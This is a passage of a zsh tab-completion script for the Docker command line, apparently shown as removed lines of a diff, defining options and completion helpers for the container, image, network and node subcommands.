or stderr]:device:(STDIN STDOUT STDERR)" - "($help)*--add-host=[Add a custom host-to-IP mapping]:host\:ip mapping: " - "($help)*--blkio-weight-device=[Block IO (relative device weight)]:device:Block IO weight: " - "($help)*--cap-add=[Add Linux capabilities]:capability: " - "($help)*--cap-drop=[Drop Linux capabilities]:capability: " - "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: " - "($help)--cidfile=[Write the container ID to the file]:CID file:_files" - "($help)--cpus=[Number of 
CPUs (default 0.000)]:cpus: " - "($help)*--device=[Add a host device to the container]:device:_files" - "($help)*--device-read-bps=[Limit the read rate (bytes per second) from a device]:device:IO rate: " - "($help)*--device-read-iops=[Limit the read rate (IO per second) from a device]:device:IO rate: " - "($help)*--device-write-bps=[Limit the write rate (bytes per second) to a device]:device:IO rate: " - "($help)*--device-write-iops=[Limit the write rate (IO per second) to a device]:device:IO rate: " - "($help)--disable-content-trust[Skip image verification]" - "($help)*--dns=[Custom DNS servers]:DNS server: " - "($help)*--dns-option=[Custom DNS options]:DNS option: " - "($help)*--dns-search=[Custom DNS search domains]:DNS domains: " - "($help)*"{-e=,--env=}"[Environment variables]:environment variable: " - "($help)--entrypoint=[Overwrite the default entrypoint of the image]:entry point: " - "($help)*--env-file=[Read environment variables from a file]:environment file:_files" - "($help)*--expose=[Expose a port from the container without publishing it]: " - "($help)*--group=[Set one or more supplementary user groups for the container]:group:_groups" - "($help -h --hostname)"{-h=,--hostname=}"[Container host name]:hostname:_hosts" - "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]" - "($help)--init[Run an init inside the container that forwards signals and reaps processes]" - "($help)--ip=[Container IPv4 address]:IPv4: " - "($help)--ip6=[Container IPv6 address]:IPv6: " - "($help)--ipc=[IPC namespace to use]:IPC namespace: " - "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)" - "($help)*--link=[Add link to another container]:link:->link" - "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: " - "($help)*"{-l=,--label=}"[Container metadata]:label: " - "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers" - 
"($help)*--log-opt=[Log driver specific options]:log driver options:__docker_complete_log_options" - "($help)--mac-address=[Container MAC address]:MAC address: " - "($help)--name=[Container name]:name: " - "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)" - "($help)*--network-alias=[Add network-scoped alias for the container]:alias: " - "($help)--oom-kill-disable[Disable OOM Killer]" - "($help)--oom-score-adj[Tune the host's OOM preferences for containers (accepts -1000 to 1000)]" - "($help)--pids-limit[Tune container pids limit (set -1 for unlimited)]" - "($help -P --publish-all)"{-P,--publish-all}"[Publish all exposed ports]" - "($help)*"{-p=,--publish=}"[Expose a container's port to the host]:port:_ports" - "($help)--pid=[PID namespace to use]:PID namespace:__docker_complete_pid" - "($help)--privileged[Give extended privileges to this container]" - "($help)--read-only[Mount the container's root filesystem as read only]" - "($help)*--security-opt=[Security options]:security option: " - "($help)*--shm-size=[Size of '/dev/shm' (format is '')]:shm size: " - "($help)--stop-timeout=[Timeout (in seconds) to stop a container]:time: " - "($help)*--sysctl=-[sysctl options]:sysctl: " - "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]" - "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" - "($help)*--ulimit=[ulimit options]:ulimit: " - "($help)--userns=[Container user namespace]:user namespace:(host)" - "($help)--tmpfs[mount tmpfs]" - "($help)*-v[Bind mount a volume]:volume: " - "($help)--volume-driver=[Optional volume driver for the container]:volume driver:(local)" - "($help)*--volumes-from=[Mount volumes from the specified container]:volume: " - "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories" - ) - opts_create_run_update=( - "($help)--blkio-weight=[Block IO (relative weight), between 10 and 1000]:Block IO weight:(10 100 500 1000)" - "($help -c 
--cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU shares:(0 10 100 200 500 800 1000)" - "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: " - "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: " - "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: " - "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: " - "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: " - "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: " - "($help)--kernel-memory=[Kernel memory limit in bytes]:Memory limit: " - "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: " - "($help)--memory-reservation=[Memory soft limit]:Memory limit: " - "($help)--memory-swap=[Total memory limit with swap]:Memory limit: " - "($help)--restart=[Restart policy]:restart policy:(no on-failure always unless-stopped)" - ) - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (attach) - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_attach_exec_run_start \ - "($help)--no-stdin[Do not attach stdin]" \ - "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \ - "($help -):containers:__docker_complete_running_containers" && ret=0 - ;; - (commit) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --author)"{-a=,--author=}"[Author]:author: " \ - "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \ - "($help -m --message)"{-m=,--message=}"[Commit message]:message: " \ - "($help -p --pause)"{-p,--pause}"[Pause container during commit]" \ - "($help -):container:__docker_complete_containers" \ - "($help -): :__docker_complete_repositories_with_tags" && ret=0 - ;; - (cp) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -L --follow-link)"{-L,--follow-link}"[Always follow symbol 
link]" \ - "($help -)1:container:->container" \ - "($help -)2:hostpath:_files" && ret=0 - case $state in - (container) - if compset -P "*:"; then - _files && ret=0 - else - __docker_complete_containers -qS ":" && ret=0 - fi - ;; - esac - ;; - (create) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_create_run \ - $opts_create_run_update \ - "($help -): :__docker_complete_images" \ - "($help -):command: _command_names -e" \ - "($help -)*::arguments: _normal" && ret=0 - case $state in - (link) - if compset -P "*:"; then - _wanted alias expl "Alias" compadd -E "" && ret=0 - else - __docker_complete_running_containers -qS ":" && ret=0 - fi - ;; - esac - ;; - (diff) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:containers:__docker_complete_containers" && ret=0 - ;; - (exec) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_attach_exec_run_start \ - "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \ - "($help)*"{-e=,--env=}"[Set environment variables]:environment variable: " \ - "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]" \ - "($help)--privileged[Give extended Linux capabilities to the command]" \ - "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]" \ - "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" \ - "($help -):containers:__docker_complete_running_containers" \ - "($help -)*::command:->anycommand" && ret=0 - case $state in - (anycommand) - shift 1 words - (( CURRENT-- )) - _normal && ret=0 - ;; - esac - ;; - (export) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -o --output)"{-o=,--output=}"[Write to a file, instead of stdout]:output file:_files" \ - "($help -)*:containers:__docker_complete_containers" && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: 
" \ - "($help -s --size)"{-s,--size}"[Display total file sizes]" \ - "($help -)*:containers:__docker_complete_containers" && ret=0 - ;; - (kill) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -s --signal)"{-s=,--signal=}"[Signal to send]:signal:_signals" \ - "($help -)*:containers:__docker_complete_running_containers" && ret=0 - ;; - (logs) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--details[Show extra details provided to logs]" \ - "($help -f --follow)"{-f,--follow}"[Follow log output]" \ - "($help -s --since)"{-s=,--since=}"[Show logs since this timestamp]:timestamp: " \ - "($help -t --timestamps)"{-t,--timestamps}"[Show timestamps]" \ - "($help)--tail=[Output the last K lines]:lines:(1 10 20 50 all)" \ - "($help -)*:containers:__docker_complete_containers" && ret=0 - ;; - (ls|list) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Show all containers]" \ - "($help)--before=[Show only container created before...]:containers:__docker_complete_containers" \ - "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_ps_filters" \ - "($help)--format=[Pretty-print containers using a Go template]:template: " \ - "($help -l --latest)"{-l,--latest}"[Show only the latest created container]" \ - "($help -n --last)"{-n=,--last=}"[Show n last created containers (includes all states)]:n:(1 5 10 25 50)" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ - "($help -s --size)"{-s,--size}"[Display total file sizes]" \ - "($help)--since=[Show only containers created since...]:containers:__docker_complete_containers" && ret=0 - ;; - (pause|unpause) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:containers:__docker_complete_running_containers" && ret=0 - ;; - (port) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)1:containers:__docker_complete_running_containers" \ - "($help -)2:port:_ports" && ret=0 - ;; - 
(prune) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ - "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 - ;; - (rename) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -):old name:__docker_complete_containers" \ - "($help -):new name: " && ret=0 - ;; - (restart) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \ - "($help -)*:containers:__docker_complete_containers_ids" && ret=0 - ;; - (rm) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Force removal]" \ - "($help -l --link)"{-l,--link}"[Remove the specified link and not the underlying container]" \ - "($help -v --volumes)"{-v,--volumes}"[Remove the volumes associated to the container]" \ - "($help -)*:containers:->values" && ret=0 - case $state in - (values) - if [[ ${words[(r)-f]} == -f || ${words[(r)--force]} == --force ]]; then - __docker_complete_containers && ret=0 - else - __docker_complete_stopped_containers && ret=0 - fi - ;; - esac - ;; - (run) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_create_run \ - $opts_create_run_update \ - $opts_attach_exec_run_start \ - "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \ - "($help)--health-cmd=[Command to run to check health]:command: " \ - "($help)--health-interval=[Time between running the check]:time: " \ - "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)" \ - "($help)--health-timeout=[Maximum time to allow one check to run]:time: " \ - "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]" \ - "($help)--rm[Remove intermediate containers when it exits]" \ - "($help)--runtime=[Name of the runtime to 
be used for that container]:runtime:__docker_complete_runtimes" \ - "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \ - "($help)--stop-signal=[Signal to kill a container]:signal:_signals" \ - "($help)--storage-opt=[Storage driver options for the container]:storage options:->storage-opt" \ - "($help -): :__docker_complete_images" \ - "($help -):command: _command_names -e" \ - "($help -)*::arguments: _normal" && ret=0 - case $state in - (link) - if compset -P "*:"; then - _wanted alias expl "Alias" compadd -E "" && ret=0 - else - __docker_complete_running_containers -qS ":" && ret=0 - fi - ;; - (storage-opt) - if compset -P "*="; then - _message "value" && ret=0 - else - opts=('size') - _describe -t filter-opts "storage options" opts -qS "=" && ret=0 - fi - ;; - esac - ;; - (start) - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_attach_exec_run_start \ - "($help -a --attach)"{-a,--attach}"[Attach container's stdout/stderr and forward all signals]" \ - "($help -i --interactive)"{-i,--interactive}"[Attach container's stding]" \ - "($help -)*:containers:__docker_complete_stopped_containers" && ret=0 - ;; - (stats) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Show all containers (default shows just running)]" \ - "($help)--format=[Pretty-print images using a Go template]:template: " \ - "($help)--no-stream[Disable streaming stats and only pull the first result]" \ - "($help -)*:containers:__docker_complete_running_containers" && ret=0 - ;; - (stop) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \ - "($help -)*:containers:__docker_complete_running_containers" && ret=0 - ;; - (top) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)1:containers:__docker_complete_running_containers" \ - "($help -)*:: 
:->ps-arguments" && ret=0 - case $state in - (ps-arguments) - _ps && ret=0 - ;; - esac - ;; - (update) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - opts_create_run_update \ - "($help -)*: :->values" && ret=0 - case $state in - (values) - if [[ ${words[(r)--kernel-memory*]} = (--kernel-memory*) ]]; then - __docker_complete_stopped_containers && ret=0 - else - __docker_complete_containers && ret=0 - fi - ;; - esac - ;; - (wait) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:containers:__docker_complete_running_containers" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0 - ;; - esac - - return ret -} - -# EO container - -# BO image - -__docker_image_commands() { - local -a _docker_image_subcommands - _docker_image_subcommands=( - "build:Build an image from a Dockerfile" - "history:Show the history of an image" - "import:Import the contents from a tarball to create a filesystem image" - "inspect:Display detailed information on one or more images" - "load:Load an image from a tar archive or STDIN" - "ls:List images" - "prune:Remove unused images" - "pull:Pull an image or a repository from a registry" - "push:Push an image or a repository to a registry" - "rm:Remove one or more images" - "save:Save one or more images to a tar archive (streamed to STDOUT by default)" - "tag:Tag an image into a repository" - ) - _describe -t docker-image-commands "docker image command" _docker_image_subcommands -} - -__docker_image_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (build) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*--build-arg=[Build-time variables]:=: " \ - "($help)*--cache-from=[Images to consider as cache sources]: :__docker_complete_repositories_with_tags" \ - "($help -c --cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU 
shares:(0 10 100 200 500 800 1000)" \ - "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: " \ - "($help)--compress[Compress the build context using gzip]" \ - "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: " \ - "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: " \ - "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: " \ - "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: " \ - "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: " \ - "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: " \ - "($help)--disable-content-trust[Skip image verification]" \ - "($help -f --file)"{-f=,--file=}"[Name of the Dockerfile]:Dockerfile:_files" \ - "($help)--force-rm[Always remove intermediate containers]" \ - "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)" \ - "($help)*--label=[Set metadata for an image]:label=value: " \ - "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: " \ - "($help)--memory-swap=[Total memory limit with swap]:Memory limit: " \ - "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)" \ - "($help)--no-cache[Do not use cache when building the image]" \ - "($help)--pull[Attempt to pull a newer version of the image]" \ - "($help -q --quiet)"{-q,--quiet}"[Suppress verbose build output]" \ - "($help)--rm[Remove intermediate containers after a successful build]" \ - "($help)*--shm-size=[Size of '/dev/shm' (format is '')]:shm size: " \ - "($help -t --tag)*"{-t=,--tag=}"[Repository, name and tag for the image]: :__docker_complete_repositories_with_tags" \ - "($help)*--ulimit=[ulimit options]:ulimit: " \ - "($help)--userns=[Container user namespace]:user namespace:(host)" \ - "($help -):path or URL:_directories" && ret=0 - ;; - (history) - _arguments $(__docker_arguments) 
\ - $opts_help \ - "($help -H --human)"{-H,--human}"[Print sizes and dates in human readable format]" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ - "($help -)*: :__docker_complete_images" && ret=0 - ;; - (import) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \ - "($help -m --message)"{-m=,--message=}"[Commit message for imported image]:message: " \ - "($help -):URL:(- http:// file://)" \ - "($help -): :__docker_complete_repositories_with_tags" && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help -)*:images:__docker_complete_images" && ret=0 - ;; - (load) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -i --input)"{-i=,--input=}"[Read from tar archive file]:archive file:_files -g \"*.((tar|TAR)(.gz|.GZ|.Z|.bz2|.lzma|.xz|)|(tbz|tgz|txz))(-.)\"" \ - "($help -q --quiet)"{-q,--quiet}"[Suppress the load output]" && ret=0 - ;; - (ls|list) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Show all images]" \ - "($help)--digests[Show digests]" \ - "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \ - "($help)--format=[Pretty-print images using a Go template]:template: " \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ - "($help -): :__docker_complete_repositories" && ret=0 - case $state in - (filter-options) - __docker_complete_images_filters && ret=0 - ;; - esac - ;; - (prune) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Remove all unused images, not just dangling ones]" \ - "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ - "($help -f --force)"{-f,--force}"[Do not 
prompt for confirmation]" && ret=0 - ;; - (pull) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all-tags)"{-a,--all-tags}"[Download all tagged images]" \ - "($help)--disable-content-trust[Skip image verification]" \ - "($help -):name:__docker_search" && ret=0 - ;; - (push) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--disable-content-trust[Skip image signing]" \ - "($help -): :__docker_complete_images" && ret=0 - ;; - (rm) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Force removal]" \ - "($help)--no-prune[Do not delete untagged parents]" \ - "($help -)*: :__docker_complete_images" && ret=0 - ;; - (save) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -o --output)"{-o=,--output=}"[Write to file]:file:_files" \ - "($help -)*: :__docker_complete_images" && ret=0 - ;; - (tag) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -):source:__docker_complete_images"\ - "($help -):destination:__docker_complete_repositories_with_tags" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0 - ;; - esac - - return ret -} - -# EO image - -# BO network - -__docker_network_complete_ls_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (driver) - __docker_complete_info_plugins Network && ret=0 - ;; - (id) - __docker_complete_networks_ids && ret=0 - ;; - (name) - __docker_complete_networks_names && ret=0 - ;; - (type) - type_opts=('builtin' 'custom') - _describe -t type-filter-opts "Type Filter Options" type_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('driver' 'id' 'label' 'name' 'type') - _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_get_networks() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines networks - - type=$1; shift - - 
lines=(${(f)${:-"$(_call_program commands docker $docker_options network ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Network ID - if [[ $type = (ids|all) ]]; then - for line in $lines; do - s="${line[${begin[NETWORK ID]},${end[NETWORK ID]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" - s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}" - networks=($networks $s) - done - fi - - # Names - if [[ $type = (names|all) ]]; then - for line in $lines; do - s="${line[${begin[NAME]},${end[NAME]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" - s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}" - networks=($networks $s) - done - fi - - _describe -t networks-list "networks" networks "$@" && ret=0 - return ret -} - -__docker_complete_networks() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_networks all "$@" -} - -__docker_complete_networks_ids() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_networks ids "$@" -} - -__docker_complete_networks_names() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_networks names "$@" -} - -__docker_network_commands() { - local -a _docker_network_subcommands - _docker_network_subcommands=( - "connect:Connect a container to a network" - "create:Creates a new network with a name specified by the user" - "disconnect:Disconnects a container from a network" - "inspect:Displays detailed information on a network" - "ls:Lists all the networks created by the user" - "prune:Remove all unused networks" - "rm:Deletes one or more networks" - ) - _describe -t docker-network-commands "docker network 
command" _docker_network_subcommands -} - -__docker_network_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (connect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*--alias=[Add network-scoped alias for the container]:alias: " \ - "($help)--ip=[Container IPv4 address]:IPv4: " \ - "($help)--ip6=[Container IPv6 address]:IPv6: " \ - "($help)*--link=[Add a link to another container]:link:->link" \ - "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: " \ - "($help -)1:network:__docker_complete_networks" \ - "($help -)2:containers:__docker_complete_containers" && ret=0 - - case $state in - (link) - if compset -P "*:"; then - _wanted alias expl "Alias" compadd -E "" && ret=0 - else - __docker_complete_running_containers -qS ":" && ret=0 - fi - ;; - esac - ;; - (create) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help)--attachable[Enable manual container attachment]" \ - "($help)*--aux-address[Auxiliary IPv4 or IPv6 addresses used by network driver]:key=IP: " \ - "($help -d --driver)"{-d=,--driver=}"[Driver to manage the Network]:driver:(null host bridge overlay)" \ - "($help)*--gateway=[IPv4 or IPv6 Gateway for the master subnet]:IP: " \ - "($help)--internal[Restricts external access to the network]" \ - "($help)*--ip-range=[Allocate container ip from a sub-range]:IP/mask: " \ - "($help)--ipam-driver=[IP Address Management Driver]:driver:(default)" \ - "($help)*--ipam-opt=[Custom IPAM plugin options]:opt=value: " \ - "($help)--ipv6[Enable IPv6 networking]" \ - "($help)*--label=[Set metadata on a network]:label=value: " \ - "($help)*"{-o=,--opt=}"[Driver specific options]:opt=value: " \ - "($help)*--subnet=[Subnet in CIDR format that represents a network segment]:IP/mask: " \ - "($help -)1:Network Name: " && ret=0 - ;; - (disconnect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help 
-)1:network:__docker_complete_networks" \ - "($help -)2:containers:__docker_complete_containers" && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help -)*:network:__docker_complete_networks" && ret=0 - ;; - (ls) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--no-trunc[Do not truncate the output]" \ - "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ - "($help)--format=[Pretty-print networks using a Go template]:template: " \ - "($help -q --quiet)"{-q,--quiet}"[Only display numeric IDs]" && ret=0 - case $state in - (filter-options) - __docker_network_complete_ls_filters && ret=0 - ;; - esac - ;; - (prune) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ - "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 - ;; - (rm) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:network:__docker_complete_networks" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_network_commands" && ret=0 - ;; - esac - - return ret -} - -# EO network - -# BO node - -__docker_node_complete_ls_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (id) - __docker_complete_nodes_ids && ret=0 - ;; - (membership) - membership_opts=('accepted' 'pending' 'rejected') - _describe -t membership-opts "membership options" membership_opts && ret=0 - ;; - (name) - __docker_complete_nodes_names && ret=0 - ;; - (role) - role_opts=('manager' 'worker') - _describe -t role-opts "role options" role_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('id' 'label' 'membership' 'name' 'role') - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - 
-__docker_node_complete_ps_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (desired-state) - state_opts=('accepted' 'running') - _describe -t state-opts "desired state options" state_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('desired-state' 'id' 'label' 'name') - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_nodes() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines nodes args - - type=$1; shift - filter=$1; shift - [[ $filter != "none" ]] && args=("-f $filter") - - lines=(${(f)${:-"$(_call_program commands docker $docker_options node ls $args)"$'\n'}}) - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Node ID - if [[ $type = (ids|all) ]]; then - for line in $lines; do - s="${line[${begin[ID]},${end[ID]}]%% ##}" - nodes=($nodes $s) - done - fi - - # Names - if [[ $type = (names|all) ]]; then - for line in $lines; do - s="${line[${begin[NAME]},${end[NAME]}]%% ##}" - nodes=($nodes $s) - done - fi - - _describe -t nodes-list "nodes" nodes "$@" && ret=0 - return ret -} - -__docker_complete_nodes() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes all none "$@" -} - -__docker_complete_nodes_ids() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes ids none "$@" -} - -__docker_complete_nodes_names() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes names none "$@" -} - -__docker_complete_pending_nodes() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes all "membership=pending" "$@" -} - 
-__docker_complete_manager_nodes() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes all "role=manager" "$@" -} - -__docker_complete_worker_nodes() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes all "role=worker" "$@" -} - -__docker_node_commands() { - local -a _docker_node_subcommands - _docker_node_subcommands=( - "demote:Demote a node as manager in the swarm" - "inspect:Display detailed information on one or more nodes" - "ls:List nodes in the swarm" - "promote:Promote a node as manager in the swarm" - "rm:Remove one or more nodes from the swarm" - "ps:List tasks running on one or more nodes, defaults to current node" - "update:Update a node" - ) - _describe -t docker-node-commands "docker node command" _docker_node_subcommands -} - -__docker_node_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (rm|remove) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Force remove a node from the swarm]" \ - "($help -)*:node:__docker_complete_pending_nodes" && ret=0 - ;; - (demote) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:node:__docker_complete_manager_nodes" && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help)--pretty[Print the information in a human friendly format]" \ - "($help -)*:node:__docker_complete_nodes" && ret=0 - ;; - (ls|list) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ - "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 - case $state in - (filter-options) - __docker_node_complete_ls_filters && ret=0 - ;; - esac - ;; - (promote) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:node:__docker_complete_worker_nodes" && ret=0 - ;; - (ps) 
